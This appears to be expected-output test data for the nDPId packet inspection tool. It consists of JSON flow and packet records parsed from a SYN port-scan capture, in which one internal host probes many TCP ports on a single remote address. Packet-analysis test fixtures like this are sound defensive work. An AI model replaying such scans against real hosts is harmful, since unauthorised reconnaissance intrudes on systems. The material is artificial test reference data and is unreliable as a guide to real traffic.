+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1292,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1282,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsBbYAADAGEr2sEAAIQA2GNIzTJyjdU4MZAAAAAGACBAANZAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1293,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1283,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs6H4AACYGOfSsEAAIQA2GNIzTBGHdU4MZAAAAAGACDAAoKwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdMIAACoGqbCsEAAIQA2GNIzTIsPdU4MZAAAAAGACDAAJyQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1295,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsV8wAACUGy6asEAAIQA2GNIzTBPjdU4MZAAAAAGACCAArlAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1296,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1286,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdhoAADUGnVisEAAIQA2GNIzSCIPdUoMYAAAAAGACCAAoDAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1297,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs9nIAACcGKwCsEAAIQA2GNIzSE9\/dUoMYAAAAAGACEAAUsAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsjegAADcGg4qsEAAIQA2GNIzSrZrdUoMYAAAAAGACEAB69AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":427,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1289,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsNycAADcG2kusEAAIQA2GNIzSAavdUoMYAAAAAGACEAAm5AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1300,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1290,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjgAACsGpzqsEAAIQA2GNIzSD6TdUoMYAAAAAGACEAAY6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1301,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAs334AACgGQPSsEAAIQA2GNIzSCVrdUoMYAAAAAGACBAArNQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1292,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsdPQAADkGmn6sEAAIQA2GNIzSF0DdUoMYAAAAAGACCAAZTwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060438,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1303,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_packet_id":1,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060438,"pkt":"ACYLMQczACWzv5HuCABFAAAsZEIAADgGrDCsEAAIQA2GNIzSCjDdUoMYAAAAAGACBAAqXwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1304,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsnDoAADUGdzisEAAIQA2GNIzSAcrdUoMYAAAAAGACCAAuxQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1305,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1295,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAs3AsAADkGM2esEAAIQA2GNIzSBCzdUoMYAAAAAGACCAAsYwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1306,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1296,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsqx8AACoGc1OsEAAIQA2GNIzSBqTdUoMYAAAAAGACDAAl6wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1307,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsIRsAACkG\/lesEAAIQA2GNIzSArPdUoMYAAAAAGACCAAt3AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5910,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1308,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1298,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsTGQAACcG1Q6sEAAIQA2GNIzSFxbdUoMYAAAAAGACEAAReQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060439,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1309,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_packet_id":1,"flow_last_seen":1278275060439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060439,"pkt":"ACYLMQczACWzv5HuCABFAAAsspgAACoGa9qsEAAIQA2GNIzSI4\/dUoMYAAAAAGACDAAJAAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1310,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1300,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAszS8AADgGQ0OsEAAIQA2GNIzTgAHdU4MZAAAAAGACBAC0igAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060456,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1311,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_packet_id":1,"flow_last_seen":1278275060456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060456,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHEAADUGawGsEAAIQA2GNIzTAsfdU4MZAAAAAGACCAAtxQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2041,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1312,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1302,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsdBIAADgGnGCsEAAIQA2GNIzTB\/ndU4MZAAAAAGACBAAskwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1313,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsSU4AADMGzCSsEAAIQA2GNIzTBErdU4MZAAAAAGACEAAkQgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3551,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1314,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1304,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsCE4AADMGDSWsEAAIQA2GNIzTDd\/dU4MZAAAAAGACEAAarQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1305,"flow_packet_id":1,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060490,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf4AACgG+nSsEAAIQA2GNIzTG3HdU4MZAAAAAGACBAAZGwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1316,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060490,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
